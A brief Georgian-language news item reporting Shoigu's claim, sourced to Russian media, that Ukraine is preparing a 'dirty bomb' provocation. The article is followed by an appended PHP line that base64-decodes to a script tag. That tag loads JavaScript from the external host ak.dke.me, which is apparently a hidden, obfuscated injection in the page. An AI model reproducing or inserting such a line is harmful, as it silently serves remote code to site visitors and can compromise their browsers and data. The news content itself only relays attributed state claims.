celsiusi
ავერსი საქკაბელი
რუსეთის თავდაცვის მინისტრ სერგეი შოიგუს განცხადებით, უკრაინა ომში „ბინძური ბომბით“ გეგმავს პროვოკაციას.
 
როგორც რუსული მედია წერს, აღნიშნულ საკითხთან დაკავშირებით რუსეთის თავდაცვის უწყების ხელმძღვანელი აშშ-ის, ბრიტანეთის, საფრანგეთისა და თურქეთის თავდაცვის მინისტრებს ტელეფონით ესაუბრა.
 
მანამდე რუსულმა მედიამ გამოაქვეყნა სტატია, რომელშიც „სხვადასხვა ქვეყანაში სანდო წყაროების“ მოტივით, ნათქვამია, რომ უკრაინა სავარაუდოდ ამზადებს პროვოკაციას „ბინძური ბომბის“ აფეთქებით, შემდეგ კი აპირებს ამაში რუსეთის დადანაშაულებას. რუსული მედია წერს, რომ „ბინძური ბომბი“ რადიოლოგიური იარაღის უმარტივესი ვერსიაა და ასეთი ბომბის აფეთქების შედეგად, მთავარი ზიანი არა აფეთქებას, არამედ რადიოაქტიური მასალის გაფრქვევას მოაქვს.
386
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");